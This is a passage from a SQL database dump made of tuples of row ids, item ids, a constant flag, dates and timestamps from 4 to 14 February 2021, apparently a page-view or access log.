11:43:26'),(12846,108,1,'2021-02-04','2021-02-04 11:49:52'),(12847,76,1,'2021-02-04','2021-02-04 11:52:18'),(12848,76,1,'2021-02-04','2021-02-04 11:54:35'),(12849,108,1,'2021-02-04','2021-02-04 11:55:10'),(12850,76,1,'2021-02-04','2021-02-04 11:56:05'),(12851,84,1,'2021-02-04','2021-02-04 11:56:21'),(12852,1877,1,'2021-02-04','2021-02-04 11:57:16'),(12853,80,1,'2021-02-04','2021-02-04 11:59:40'),(12854,3245,1,'2021-02-04','2021-02-04 12:15:53'),(12855,1600,1,'2021-02-04','2021-02-04 13:49:02'),(12856,2309,1,'2021-02-04','2021-02-04 14:55:54'),(12857,1612,1,'2021-02-04','2021-02-04 15:30:30'),(12858,1614,1,'2021-02-04','2021-02-04 16:45:29'),(12859,2503,1,'2021-02-04','2021-02-04 17:03:49'),(12860,2178,1,'2021-02-04','2021-02-04 17:07:53'),(12861,1586,1,'2021-02-04','2021-02-04 18:23:12'),(12862,1600,1,'2021-02-04','2021-02-04 18:28:36'),(12863,3030,1,'2021-02-04','2021-02-04 20:51:45'),(12864,1600,1,'2021-02-04','2021-02-04 21:25:36'),(12865,1739,1,'2021-02-04','2021-02-04 21:28:37'),(12866,1600,1,'2021-02-04','2021-02-04 21:29:18'),(12867,68,1,'2021-02-04','2021-02-04 22:16:09'),(12868,68,1,'2021-02-04','2021-02-04 22:16:52'),(12869,1741,1,'2021-02-04','2021-02-04 22:19:06'),(12870,1741,1,'2021-02-04','2021-02-04 22:19:11'),(12871,1741,1,'2021-02-04','2021-02-04 22:19:51'),(12872,1741,1,'2021-02-04','2021-02-04 22:20:43'),(12873,1600,1,'2021-02-04','2021-02-04 22:33:47'),(12874,1608,1,'2021-02-04','2021-02-04 23:23:01'),(12875,1608,1,'2021-02-04','2021-02-04 23:23:26'),(12876,2309,1,'2021-02-04','2021-02-04 23:57:42'),(12877,2309,1,'2021-02-04','2021-02-04 23:57:48'),(12878,1586,1,'2021-02-05','2021-02-05 00:28:19'),(12879,1713,1,'2021-02-05','2021-02-05 00:29:39'),(12880,1718,1,'2021-02-05','2021-02-05 01:16:38'),(12881,3030,1,'2021-02-05','2021-02-05 01:24:41'),(12882,1776,1,'2021-02-05','2021-02-05 04:22:50'),(12883,1606,1,'2021-02-05','2021-02-05 08:12:41'),(12884,2989,1,'2021-02-05','2021-02-05 08:13:16'),(12885,1596,1,'2021-02-05','2021-02-05 08:58:27'),(12886,2309,1,'2021-02-05','2021-02-05 09:01:24'),(12887,3313,1,'2021-02-05','2021-02-05 10:22:34'),(12888,1596,1,'2021-02-05','2021-02-05 12:00:20'),(12889,1596,1,'2021-02-05','2021-02-05 12:00:56'),(12890,1596,1,'2021-02-05','2021-02-05 12:01:32'),(12891,1747,1,'2021-02-05','2021-02-05 12:03:39'),(12892,1747,1,'2021-02-05','2021-02-05 12:05:16'),(12893,91,1,'2021-02-05','2021-02-05 12:07:20'),(12894,2159,1,'2021-02-05','2021-02-05 12:10:05'),(12895,2309,1,'2021-02-05','2021-02-05 12:16:51'),(12896,2309,1,'2021-02-05','2021-02-05 12:16:54'),(12897,2309,1,'2021-02-05','2021-02-05 12:17:24'),(12898,1604,1,'2021-02-05','2021-02-05 12:41:52'),(12899,1582,1,'2021-02-05','2021-02-05 13:05:13'),(12900,84,1,'2021-02-05','2021-02-05 13:06:50'),(12901,84,1,'2021-02-05','2021-02-05 13:08:52'),(12902,1604,1,'2021-02-05','2021-02-05 13:24:25'),(12903,1582,1,'2021-02-05','2021-02-05 13:24:33'),(12904,1588,1,'2021-02-05','2021-02-05 13:26:09'),(12905,1747,1,'2021-02-05','2021-02-05 13:42:10'),(12906,84,1,'2021-02-05','2021-02-05 13:42:28'),(12907,1877,1,'2021-02-05','2021-02-05 13:53:39'),(12908,1604,1,'2021-02-05','2021-02-05 14:01:37'),(12909,68,1,'2021-02-05','2021-02-05 14:01:59'),(12910,80,1,'2021-02-05','2021-02-05 14:02:42'),(12911,89,1,'2021-02-05','2021-02-05 14:05:42'),(12912,1604,1,'2021-02-05','2021-02-05 14:06:47'),(12913,1604,1,'2021-02-05','2021-02-05 14:07:02'),(12914,72,1,'2021-02-05','2021-02-05 14:22:31'),(12915,3030,1,'2021-02-05','2021-02-05 14:33:43'),(12916,2309,1,'2021-02-05','2021-02-05 14:52:20'),(12917,1600,1,'2021-02-05','2021-02-05 14:54:57'),(12918,68,1,'2021-02-05','2021-02-05 14:55:02'),(12919,76,1,'2021-02-05','2021-02-05 14:55:24'),(12920,87,1,'2021-02-05','2021-02-05 14:55:29'),(12921,468,1,'2021-02-05','2021-02-05 14:55:49'),(12922,87,1,'2021-02-05','2021-02-05 14:56:15'),(12923,80,1,'2021-02-05','2021-02-05 14:56:22'),(12924,87,1,'2021-02-05','2021-02-05 15:00:52'),(12925,87,1,'2021-02-05','2021-02-05 15:00:58'),(12926,470,1,'2021-02-05','2021-02-05 15:01:05'),(12927,3285,1,'2021-02-05','2021-02-05 15:01:37'),(12928,470,1,'2021-02-05','2021-02-05 15:01:49'),(12929,76,1,'2021-02-05','2021-02-05 15:01:51'),(12930,68,1,'2021-02-05','2021-02-05 15:01:54'),(12931,1586,1,'2021-02-05','2021-02-05 15:13:15'),(12932,1713,1,'2021-02-05','2021-02-05 15:15:23'),(12933,1718,1,'2021-02-05','2021-02-05 16:10:59'),(12934,1870,1,'2021-02-05','2021-02-05 16:18:43'),(12935,3245,1,'2021-02-05','2021-02-05 16:29:37'),(12936,2154,1,'2021-02-05','2021-02-05 17:46:32'),(12937,1602,1,'2021-02-05','2021-02-05 19:20:22'),(12938,80,1,'2021-02-05','2021-02-05 19:20:54'),(12939,68,1,'2021-02-05','2021-02-05 19:33:36'),(12940,80,1,'2021-02-05','2021-02-05 19:33:46'),(12941,1602,1,'2021-02-05','2021-02-05 19:33:51'),(12942,2457,1,'2021-02-05','2021-02-05 20:49:56'),(12943,2769,1,'2021-02-05','2021-02-05 21:49:40'),(12944,2457,1,'2021-02-05','2021-02-05 22:18:42'),(12945,2309,1,'2021-02-05','2021-02-05 22:39:10'),(12946,3253,1,'2021-02-06','2021-02-06 04:12:45'),(12947,2309,1,'2021-02-06','2021-02-06 11:10:43'),(12948,2309,1,'2021-02-06','2021-02-06 11:38:20'),(12949,2309,1,'2021-02-06','2021-02-06 14:00:24'),(12950,3092,1,'2021-02-06','2021-02-06 14:21:00'),(12951,2309,1,'2021-02-06','2021-02-06 15:10:35'),(12952,3261,1,'2021-02-06','2021-02-06 15:20:54'),(12953,1600,1,'2021-02-06','2021-02-06 15:52:18'),(12954,1600,1,'2021-02-06','2021-02-06 17:07:49'),(12955,1596,1,'2021-02-06','2021-02-06 17:21:34'),(12956,1596,1,'2021-02-06','2021-02-06 17:22:29'),(12957,87,1,'2021-02-06','2021-02-06 17:24:43'),(12958,76,1,'2021-02-06','2021-02-06 17:25:30'),(12959,2911,1,'2021-02-06','2021-02-06 18:39:21'),(12960,3240,1,'2021-02-06','2021-02-06 20:58:04'),(12961,3269,1,'2021-02-06','2021-02-06 22:21:04'),(12962,3092,1,'2021-02-06','2021-02-06 23:52:56'),(12963,1592,1,'2021-02-07','2021-02-07 00:23:08'),(12964,1592,1,'2021-02-07','2021-02-07 00:23:12'),(12965,2159,1,'2021-02-07','2021-02-07 07:15:05'),(12966,1600,1,'2021-02-07','2021-02-07 07:48:15'),(12967,1592,1,'2021-02-07','2021-02-07 08:25:42'),(12968,3041,1,'2021-02-07','2021-02-07 08:32:57'),(12969,3290,1,'2021-02-07','2021-02-07 09:46:56'),(12970,3058,1,'2021-02-07','2021-02-07 10:25:15'),(12971,1747,1,'2021-02-07','2021-02-07 11:56:15'),(12972,2309,1,'2021-02-07','2021-02-07 13:48:37'),(12973,3290,1,'2021-02-07','2021-02-07 14:33:44'),(12974,3269,1,'2021-02-07','2021-02-07 15:26:58'),(12975,1614,1,'2021-02-07','2021-02-07 15:49:13'),(12976,1614,1,'2021-02-07','2021-02-07 15:50:00'),(12977,87,1,'2021-02-07','2021-02-07 16:20:21'),(12978,473,1,'2021-02-07','2021-02-07 16:20:43'),(12979,87,1,'2021-02-07','2021-02-07 16:21:18'),(12980,1582,1,'2021-02-07','2021-02-07 16:37:12'),(12981,80,1,'2021-02-07','2021-02-07 17:02:53'),(12982,80,1,'2021-02-07','2021-02-07 18:07:06'),(12983,3038,1,'2021-02-07','2021-02-07 18:18:45'),(12984,1600,1,'2021-02-07','2021-02-07 19:56:08'),(12985,1600,1,'2021-02-07','2021-02-07 19:56:38'),(12986,3041,1,'2021-02-07','2021-02-07 20:11:07'),(12987,1586,1,'2021-02-07','2021-02-07 20:20:56'),(12988,1582,1,'2021-02-07','2021-02-07 20:23:00'),(12989,3104,1,'2021-02-07','2021-02-07 20:27:09'),(12990,3313,1,'2021-02-07','2021-02-07 22:32:13'),(12991,3438,1,'2021-02-07','2021-02-07 22:32:14'),(12992,3316,1,'2021-02-07','2021-02-07 22:32:16'),(12993,3316,1,'2021-02-07','2021-02-07 22:32:17'),(12994,3430,1,'2021-02-07','2021-02-07 22:32:24'),(12995,3287,1,'2021-02-07','2021-02-07 22:32:56'),(12996,1724,1,'2021-02-08','2021-02-08 00:16:34'),(12997,2457,1,'2021-02-08','2021-02-08 00:48:11'),(12998,1586,1,'2021-02-08','2021-02-08 02:08:28'),(12999,2617,1,'2021-02-08','2021-02-08 02:09:33'),(13000,1586,1,'2021-02-08','2021-02-08 02:29:03'),(13001,1606,1,'2021-02-08','2021-02-08 06:44:01'),(13002,1606,1,'2021-02-08','2021-02-08 06:44:09'),(13003,1600,1,'2021-02-08','2021-02-08 10:02:41'),(13004,1600,1,'2021-02-08','2021-02-08 10:16:29'),(13005,2769,1,'2021-02-08','2021-02-08 10:49:14'),(13006,1614,1,'2021-02-08','2021-02-08 10:53:31'),(13007,80,1,'2021-02-08','2021-02-08 10:54:06'),(13008,84,1,'2021-02-08','2021-02-08 10:55:17'),(13009,1870,1,'2021-02-08','2021-02-08 10:55:26'),(13010,1600,1,'2021-02-08','2021-02-08 11:24:10'),(13011,2309,1,'2021-02-08','2021-02-08 12:01:55'),(13012,3479,1,'2021-02-08','2021-02-08 13:18:06'),(13013,3479,1,'2021-02-08','2021-02-08 13:18:08'),(13014,3479,1,'2021-02-08','2021-02-08 13:18:21'),(13015,2769,1,'2021-02-08','2021-02-08 13:51:33'),(13016,1612,1,'2021-02-08','2021-02-08 13:59:10'),(13017,3482,1,'2021-02-08','2021-02-08 14:16:37'),(13018,3486,1,'2021-02-08','2021-02-08 14:16:38'),(13019,3486,1,'2021-02-08','2021-02-08 14:16:43'),(13020,3482,1,'2021-02-08','2021-02-08 14:16:48'),(13021,3486,1,'2021-02-08','2021-02-08 14:16:49'),(13022,3482,1,'2021-02-08','2021-02-08 14:17:11'),(13023,3482,1,'2021-02-08','2021-02-08 14:17:17'),(13024,3489,1,'2021-02-08','2021-02-08 15:11:13'),(13025,3489,1,'2021-02-08','2021-02-08 15:11:29'),(13026,3489,1,'2021-02-08','2021-02-08 15:12:00'),(13027,1600,1,'2021-02-08','2021-02-08 15:30:02'),(13028,1600,1,'2021-02-08','2021-02-08 15:39:05'),(13029,1766,1,'2021-02-08','2021-02-08 15:39:51'),(13030,80,1,'2021-02-08','2021-02-08 15:40:51'),(13031,2309,1,'2021-02-08','2021-02-08 16:26:57'),(13032,1598,1,'2021-02-08','2021-02-08 19:11:53'),(13033,1598,1,'2021-02-08','2021-02-08 19:11:55'),(13034,1598,1,'2021-02-08','2021-02-08 19:12:13'),(13035,1588,1,'2021-02-08','2021-02-08 21:58:17'),(13036,3030,1,'2021-02-08','2021-02-08 22:19:54'),(13037,3092,1,'2021-02-08','2021-02-08 22:38:21'),(13038,1588,1,'2021-02-08','2021-02-08 23:01:45'),(13039,2775,1,'2021-02-08','2021-02-08 23:38:32'),(13040,2309,1,'2021-02-09','2021-02-09 00:00:12'),(13041,1606,1,'2021-02-09','2021-02-09 01:07:48'),(13042,1600,1,'2021-02-09','2021-02-09 05:52:23'),(13043,1600,1,'2021-02-09','2021-02-09 05:55:37'),(13044,1600,1,'2021-02-09','2021-02-09 05:56:52'),(13045,3092,1,'2021-02-09','2021-02-09 08:17:23'),(13046,3489,1,'2021-02-09','2021-02-09 08:21:25'),(13047,1778,1,'2021-02-09','2021-02-09 09:46:00'),(13048,2161,1,'2021-02-09','2021-02-09 10:23:29'),(13049,1586,1,'2021-02-09','2021-02-09 10:46:10'),(13050,2769,1,'2021-02-09','2021-02-09 11:06:23'),(13051,1586,1,'2021-02-09','2021-02-09 11:16:07'),(13052,1586,1,'2021-02-09','2021-02-09 11:17:03'),(13053,72,1,'2021-02-09','2021-02-09 11:25:49'),(13054,87,1,'2021-02-09','2021-02-09 11:26:18'),(13055,486,1,'2021-02-09','2021-02-09 11:27:02'),(13056,477,1,'2021-02-09','2021-02-09 11:27:30'),(13057,477,1,'2021-02-09','2021-02-09 11:27:54'),(13058,1586,1,'2021-02-09','2021-02-09 11:45:16'),(13059,68,1,'2021-02-09','2021-02-09 11:47:27'),(13060,1586,1,'2021-02-09','2021-02-09 11:50:00'),(13061,3096,1,'2021-02-09','2021-02-09 11:54:58'),(13062,1614,1,'2021-02-09','2021-02-09 12:11:35'),(13063,68,1,'2021-02-09','2021-02-09 12:14:04'),(13064,3181,1,'2021-02-09','2021-02-09 12:14:26'),(13065,3479,1,'2021-02-09','2021-02-09 12:20:47'),(13066,1718,1,'2021-02-09','2021-02-09 12:47:09'),(13067,1718,1,'2021-02-09','2021-02-09 12:48:41'),(13068,89,1,'2021-02-09','2021-02-09 12:49:00'),(13069,3083,1,'2021-02-09','2021-02-09 12:49:23'),(13070,89,1,'2021-02-09','2021-02-09 12:50:33'),(13071,3004,1,'2021-02-09','2021-02-09 12:50:52'),(13072,89,1,'2021-02-09','2021-02-09 12:51:07'),(13073,1612,1,'2021-02-09','2021-02-09 12:52:09'),(13074,89,1,'2021-02-09','2021-02-09 12:52:21'),(13075,2769,1,'2021-02-09','2021-02-09 12:52:26'),(13076,3083,1,'2021-02-09','2021-02-09 12:52:37'),(13077,89,1,'2021-02-09','2021-02-09 12:53:32'),(13078,3083,1,'2021-02-09','2021-02-09 12:55:02'),(13079,3083,1,'2021-02-09','2021-02-09 12:55:02'),(13080,3083,1,'2021-02-09','2021-02-09 12:55:02'),(13081,68,1,'2021-02-09','2021-02-09 13:18:57'),(13082,68,1,'2021-02-09','2021-02-09 13:28:28'),(13083,3489,1,'2021-02-09','2021-02-09 13:32:38'),(13084,2503,1,'2021-02-09','2021-02-09 13:33:22'),(13085,84,1,'2021-02-09','2021-02-09 13:33:35'),(13086,76,1,'2021-02-09','2021-02-09 13:34:25'),(13087,1604,1,'2021-02-09','2021-02-09 15:47:25'),(13088,1600,1,'2021-02-09','2021-02-09 16:32:29'),(13089,68,1,'2021-02-09','2021-02-09 16:37:17'),(13090,87,1,'2021-02-09','2021-02-09 16:41:26'),(13091,68,1,'2021-02-09','2021-02-09 16:41:38'),(13092,108,1,'2021-02-09','2021-02-09 16:41:46'),(13093,68,1,'2021-02-09','2021-02-09 16:42:37'),(13094,72,1,'2021-02-09','2021-02-09 16:42:57'),(13095,3181,1,'2021-02-09','2021-02-09 16:43:18'),(13096,72,1,'2021-02-09','2021-02-09 16:43:42'),(13097,3178,1,'2021-02-09','2021-02-09 16:43:59'),(13098,474,1,'2021-02-09','2021-02-09 16:44:27'),(13099,2751,1,'2021-02-09','2021-02-09 16:44:57'),(13100,1600,1,'2021-02-09','2021-02-09 17:50:17'),(13101,3087,1,'2021-02-09','2021-02-09 17:56:09'),(13102,1600,1,'2021-02-09','2021-02-09 18:07:31'),(13103,3092,1,'2021-02-09','2021-02-09 18:32:35'),(13104,3056,1,'2021-02-09','2021-02-09 19:32:34'),(13105,3030,1,'2021-02-09','2021-02-09 21:13:34'),(13106,3030,1,'2021-02-09','2021-02-09 21:14:55'),(13107,1602,1,'2021-02-09','2021-02-09 21:37:26'),(13108,1602,1,'2021-02-09','2021-02-09 21:37:42'),(13109,1602,1,'2021-02-09','2021-02-09 21:38:06'),(13110,2297,1,'2021-02-09','2021-02-09 21:40:21'),(13111,1594,1,'2021-02-09','2021-02-09 21:41:19'),(13112,1602,1,'2021-02-09','2021-02-09 21:43:37'),(13113,1586,1,'2021-02-09','2021-02-09 21:48:02'),(13114,1707,1,'2021-02-09','2021-02-09 21:55:11'),(13115,1600,1,'2021-02-09','2021-02-09 22:56:08'),(13116,1600,1,'2021-02-09','2021-02-09 22:56:14'),(13117,1544,1,'2021-02-09','2021-02-09 23:09:02'),(13118,2769,1,'2021-02-09','2021-02-09 23:30:20'),(13119,1608,1,'2021-02-10','2021-02-10 01:23:52'),(13120,1701,1,'2021-02-10','2021-02-10 01:24:37'),(13121,482,1,'2021-02-10','2021-02-10 02:38:22'),(13122,3092,1,'2021-02-10','2021-02-10 03:57:54'),(13123,1604,1,'2021-02-10','2021-02-10 04:55:08'),(13124,3079,1,'2021-02-10','2021-02-10 05:03:59'),(13125,1614,1,'2021-02-10','2021-02-10 07:19:22'),(13126,2769,1,'2021-02-10','2021-02-10 08:35:40'),(13127,1600,1,'2021-02-10','2021-02-10 09:20:47'),(13128,2751,1,'2021-02-10','2021-02-10 09:31:49'),(13129,1592,1,'2021-02-10','2021-02-10 09:45:16'),(13130,482,1,'2021-02-10','2021-02-10 09:49:15'),(13131,1606,1,'2021-02-10','2021-02-10 10:07:07'),(13132,3083,1,'2021-02-10','2021-02-10 10:08:34'),(13133,68,1,'2021-02-10','2021-02-10 10:09:53'),(13134,1602,1,'2021-02-10','2021-02-10 11:29:43'),(13135,1602,1,'2021-02-10','2021-02-10 11:29:53'),(13136,1600,1,'2021-02-10','2021-02-10 11:43:04'),(13137,89,1,'2021-02-10','2021-02-10 11:46:38'),(13138,1598,1,'2021-02-10','2021-02-10 11:47:23'),(13139,1612,1,'2021-02-10','2021-02-10 11:47:28'),(13140,1598,1,'2021-02-10','2021-02-10 11:47:43'),(13141,1598,1,'2021-02-10','2021-02-10 11:48:35'),(13142,91,1,'2021-02-10','2021-02-10 11:55:14'),(13143,3079,1,'2021-02-10','2021-02-10 11:55:46'),(13144,89,1,'2021-02-10','2021-02-10 12:00:32'),(13145,89,1,'2021-02-10','2021-02-10 12:19:38'),(13146,1612,1,'2021-02-10','2021-02-10 12:20:18'),(13147,1612,1,'2021-02-10','2021-02-10 12:36:12'),(13148,84,1,'2021-02-10','2021-02-10 13:16:12'),(13149,2609,1,'2021-02-10','2021-02-10 14:05:58'),(13150,3083,1,'2021-02-10','2021-02-10 14:09:11'),(13151,3083,1,'2021-02-10','2021-02-10 14:11:09'),(13152,3079,1,'2021-02-10','2021-02-10 14:16:54'),(13153,1614,1,'2021-02-10','2021-02-10 14:26:56'),(13154,1614,1,'2021-02-10','2021-02-10 14:28:28'),(13155,89,1,'2021-02-10','2021-02-10 14:52:21'),(13156,1614,1,'2021-02-10','2021-02-10 14:55:35'),(13157,1586,1,'2021-02-10','2021-02-10 14:56:30'),(13158,1582,1,'2021-02-10','2021-02-10 15:00:23'),(13159,2503,1,'2021-02-10','2021-02-10 15:00:44'),(13160,87,1,'2021-02-10','2021-02-10 15:52:08'),(13161,1614,1,'2021-02-10','2021-02-10 15:52:11'),(13162,91,1,'2021-02-10','2021-02-10 15:52:12'),(13163,1598,1,'2021-02-10','2021-02-10 16:06:38'),(13164,1614,1,'2021-02-10','2021-02-10 16:07:11'),(13165,1598,1,'2021-02-10','2021-02-10 16:29:36'),(13166,1586,1,'2021-02-10','2021-02-10 16:34:47'),(13167,2971,1,'2021-02-10','2021-02-10 16:54:07'),(13168,2248,1,'2021-02-10','2021-02-10 17:24:05'),(13169,1586,1,'2021-02-10','2021-02-10 17:32:22'),(13170,1612,1,'2021-02-10','2021-02-10 17:50:07'),(13171,3181,1,'2021-02-10','2021-02-10 17:55:06'),(13172,3181,1,'2021-02-10','2021-02-10 17:57:19'),(13173,3181,1,'2021-02-10','2021-02-10 17:58:28'),(13174,1588,1,'2021-02-10','2021-02-10 18:01:46'),(13175,2558,1,'2021-02-10','2021-02-10 18:33:40'),(13176,1778,1,'2021-02-10','2021-02-10 18:39:33'),(13177,570,1,'2021-02-10','2021-02-10 19:38:44'),(13178,570,1,'2021-02-10','2021-02-10 19:40:47'),(13179,68,1,'2021-02-10','2021-02-10 19:41:09'),(13180,2309,1,'2021-02-10','2021-02-10 19:52:36'),(13181,1586,1,'2021-02-10','2021-02-10 20:01:42'),(13182,2457,1,'2021-02-10','2021-02-10 21:47:43'),(13183,1586,1,'2021-02-11','2021-02-11 08:39:51'),(13184,1600,1,'2021-02-11','2021-02-11 09:02:55'),(13185,91,1,'2021-02-11','2021-02-11 09:22:45'),(13186,1586,1,'2021-02-11','2021-02-11 10:20:36'),(13187,1608,1,'2021-02-11','2021-02-11 10:23:36'),(13188,2775,1,'2021-02-11','2021-02-11 10:24:39'),(13189,1606,1,'2021-02-11','2021-02-11 10:52:46'),(13190,1600,1,'2021-02-11','2021-02-11 11:59:10'),(13191,482,1,'2021-02-11','2021-02-11 12:36:58'),(13192,1598,1,'2021-02-11','2021-02-11 12:50:28'),(13193,1598,1,'2021-02-11','2021-02-11 12:52:22'),(13194,1614,1,'2021-02-11','2021-02-11 13:36:12'),(13195,1614,1,'2021-02-11','2021-02-11 13:39:20'),(13196,3226,1,'2021-02-11','2021-02-11 13:39:44'),(13197,1614,1,'2021-02-11','2021-02-11 13:40:03'),(13198,3229,1,'2021-02-11','2021-02-11 13:40:09'),(13199,1614,1,'2021-02-11','2021-02-11 13:40:38'),(13200,3030,1,'2021-02-11','2021-02-11 14:09:17'),(13201,2309,1,'2021-02-11','2021-02-11 14:48:35'),(13202,2309,1,'2021-02-11','2021-02-11 14:49:12'),(13203,2309,1,'2021-02-11','2021-02-11 14:49:43'),(13204,2309,1,'2021-02-11','2021-02-11 14:49:44'),(13205,482,1,'2021-02-11','2021-02-11 15:37:20'),(13206,1600,1,'2021-02-11','2021-02-11 15:39:08'),(13207,1586,1,'2021-02-11','2021-02-11 16:39:29'),(13208,1586,1,'2021-02-11','2021-02-11 16:39:36'),(13209,1598,1,'2021-02-11','2021-02-11 16:48:54'),(13210,91,1,'2021-02-11','2021-02-11 17:26:39'),(13211,68,1,'2021-02-11','2021-02-11 17:27:21'),(13212,76,1,'2021-02-11','2021-02-11 17:28:05'),(13213,87,1,'2021-02-11','2021-02-11 17:34:10'),(13214,1604,1,'2021-02-11','2021-02-11 17:59:06'),(13215,1604,1,'2021-02-11','2021-02-11 17:59:35'),(13216,80,1,'2021-02-11','2021-02-11 18:00:01'),(13217,1604,1,'2021-02-11','2021-02-11 18:00:18'),(13218,1604,1,'2021-02-11','2021-02-11 18:03:04'),(13219,1604,1,'2021-02-11','2021-02-11 21:07:23'),(13220,2769,1,'2021-02-11','2021-02-11 21:12:24'),(13221,2309,1,'2021-02-11','2021-02-11 22:26:50'),(13222,335,1,'2021-02-12','2021-02-12 05:46:21'),(13223,1586,1,'2021-02-12','2021-02-12 05:59:27'),(13224,1703,1,'2021-02-12','2021-02-12 06:01:02'),(13225,482,1,'2021-02-12','2021-02-12 06:20:11'),(13226,1592,1,'2021-02-12','2021-02-12 09:10:58'),(13227,1600,1,'2021-02-12','2021-02-12 13:10:23'),(13228,1582,1,'2021-02-12','2021-02-12 15:23:57'),(13229,89,1,'2021-02-12','2021-02-12 15:34:35'),(13230,1600,1,'2021-02-12','2021-02-12 15:35:07'),(13231,1737,1,'2021-02-12','2021-02-12 15:40:18'),(13232,108,1,'2021-02-12','2021-02-12 15:48:14'),(13233,76,1,'2021-02-12','2021-02-12 15:48:22'),(13234,3087,1,'2021-02-12','2021-02-12 15:49:42'),(13235,2248,1,'2021-02-12','2021-02-12 15:52:25'),(13236,1544,1,'2021-02-12','2021-02-12 15:57:33'),(13237,2297,1,'2021-02-12','2021-02-12 16:09:19'),(13238,3087,1,'2021-02-12','2021-02-12 16:12:25'),(13239,91,1,'2021-02-12','2021-02-12 17:14:48'),(13240,2063,1,'2021-02-12','2021-02-12 17:15:12'),(13241,1739,1,'2021-02-12','2021-02-12 17:15:54'),(13242,2609,1,'2021-02-12','2021-02-12 17:16:19'),(13243,3097,1,'2021-02-12','2021-02-12 17:20:48'),(13244,482,1,'2021-02-12','2021-02-12 18:33:36'),(13245,1608,1,'2021-02-12','2021-02-12 19:09:20'),(13246,1586,1,'2021-02-12','2021-02-12 20:02:54'),(13247,2161,1,'2021-02-12','2021-02-12 20:51:25'),(13248,482,1,'2021-02-13','2021-02-13 01:03:36'),(13249,80,1,'2021-02-13','2021-02-13 03:56:00'),(13250,482,1,'2021-02-13','2021-02-13 04:04:05'),(13251,1703,1,'2021-02-13','2021-02-13 08:41:50'),(13252,2751,1,'2021-02-13','2021-02-13 12:20:23'),(13253,482,1,'2021-02-13','2021-02-13 13:36:29'),(13254,1586,1,'2021-02-13','2021-02-13 15:35:10'),(13255,1586,1,'2021-02-13','2021-02-13 15:35:47'),(13256,1586,1,'2021-02-13','2021-02-13 15:36:10'),(13257,1596,1,'2021-02-13','2021-02-13 15:40:36'),(13258,1596,1,'2021-02-13','2021-02-13 15:40:40'),(13259,1592,1,'2021-02-13','2021-02-13 16:14:21'),(13260,482,1,'2021-02-13','2021-02-13 18:10:15'),(13261,470,1,'2021-02-13','2021-02-13 18:47:54'),(13262,470,1,'2021-02-13','2021-02-13 20:06:30'),(13263,1594,1,'2021-02-13','2021-02-13 20:18:44'),(13264,1586,1,'2021-02-13','2021-02-13 20:19:38'),(13265,1586,1,'2021-02-13','2021-02-13 20:20:28'),(13266,2457,1,'2021-02-13','2021-02-13 22:07:24'),(13267,480,1,'2021-02-13','2021-02-13 23:07:23'),(13268,482,1,'2021-02-14','2021-02-14 00:11:26'),(13269,1600,1,'2021-02-14','2021-02-14 01:27:16'),(13270,1608,1,'2021-02-14','2021-02-14 05:03:29'),(13271,3285,1,'2021-02-14','2021-02-14 05:04:03'),(13272,80,1,'2021-02-14','2021-02-14 05:04:28'),(13273,2159,1,'2021-02-14','2021-02-14 07:27:18'),(13274,1586,1,'2021-02-14','2021-02-14 07:37:20'),(13275,1586,1,'2021-02-14','2021-02-14 07:39:42'),(13276,2159,1,'2021-02-14','2021-02-14 07:46:27'),(13277,2159,1,'2021-02-14','2021-02-14 07:50:13'),(13278,68,1,'2021-02-14','2021-02-14 08:22:16'),(13279,2503,1,'2021-02-14','2021-02-14 08:47:19'),(13280,2457,1,'2021-02-14','2021-02-14 08:58:39'),(13281,1582,1,'2021-02-14','2021-02-14 10:58:18'),(13282,2904,1,'2021-02-14','2021-02-14 10:58:37'),(13283,1582,1,'2021-02-14','2021-02-14 11:02:29'),(13284,1600,1,'2021-02-14','2021-02-14 11:03:22'),(13285,1600,1,'2021-02-14','2021-02-14 11:03:56'),(13286,482,1,'2021-02-14','2021-02-14 11:28:52'),(13287,3097,1,'2021-02-14','2021-02-14 11:37:57'),(13288,1701,1,'2021-02-14','2021-02-14 12:01:24'),(13289,3097,1,'2021-02-14','2021-02-14 12:35:26'),(13290,2156,1,'2021-02-14','2021-02-14 12:35:40'),(13291,3257,1,'2021-02-14','2021-02-14 12:35:47'),(13292,2558,1,'2021-02-14','2021-02-14 12:41:39'),(13293,2934,1,'2021-02-14','2021-02-14 12:41:49'),(13294,2296,1,'2021-02-14','2021-02-14 12:43:28'),(13295,1705,1,'2021-02-14','2021-02-14 12:51:44'),(13296,3104,1,'2021-02-14','2021-02-14 12:51:56'),(13297,1711,1,'2021-02-14','2021-02-14 13:01:40'),(13298,3259,1,'2021-02-14','2021-02-14 13:04:27'),(13299,3053,1,'2021-02-14','2021-02-14 13:05:54'),(13300,1743,1,'2021-02-14','2021-02-14 13:11:54'),(13301,1743,1,'2021-02-14','2021-02-14 13:11:57'),(13302,1606,1,'2021-02-14','2021-02-14 13:12:25'),(13303,1586,1,'2021-02-14','2021-02-14 13:16:09'),(13304,479,1,'2021-02-14','2021-02-14 13:24:09'),(13305,3247,1,'2021-02-14','2021-02-14 13:32:09'),(13306,3053,1,'2021-02-14','2021-02-14 13:32:11'),(13307,476,1,'2021-02-14','2021-02-14 13:36:31'),(13308,3273,1,'2021-02-14','2021-02-14 13:42:06'),(13309,1711,1,'2021-02-14','2021-02-14 13:47:02'),(13310,2991,1,'2021-02-14','2021-02-14 13:48:13'),(13311,2558,1,'2021-02-14','2021-02-14 13:54:44'),(13312,3099,1,'2021-02-14','2021-02-14 13:56:55'),(13313,3278,1,'2021-02-14','2021-02-14 14:05:38'),(13314,1739,1,'2021-02-14','2021-02-14 14:14:02'),(13315,3313,1,'2021-02-14','2021-02-14 14:15:01'),(13316,1582,1,'2021-02-14','2021-02-14 14:22:06'),(13317,1586,1,'2021-02-14','2021-02-14 14:22:41'),(13318,1614,1,'2021-02-14','2021-02-14 14:24:16'),(13319,1588,1,'2021-02-14','2021-02-14 14:32:01'),(13320,1612,1,'2021-02-14','2021-02-14 14:32:19'),(13321,3243,1,'2021-02-14','2021-02-14 14:35:39'),(13322,2395,1,'2021-02-14','2021-02-14 14:43:54'),(13323,80,1,'2021-02-14','2021-02-14 14:48:02'),(13324,3087,1,'2021-02-14','2021-02-14 14:50:25'),(13325,570,1,'2021-02-14','2021-02-14 14:52:16'),(13326,1586,1,'2021-02-14','2021-02-14 14:56:32'),(13327,76,1,'2021-02-14','2021-02-14 14:57:25'),(13328,1586,1,'2021-02-14','2021-02-14 14:58:18'),(13329,1600,1,'2021-02-14','2021-02-14 15:02:25'),(13330,2309,1,'2021-02-14','2021-02-14 15:08:58'),(13331,2159,1,'2021-02-14','2021-02-14 15:14:28'),(13332,2309,1,'2021-02-14','2021-02-14 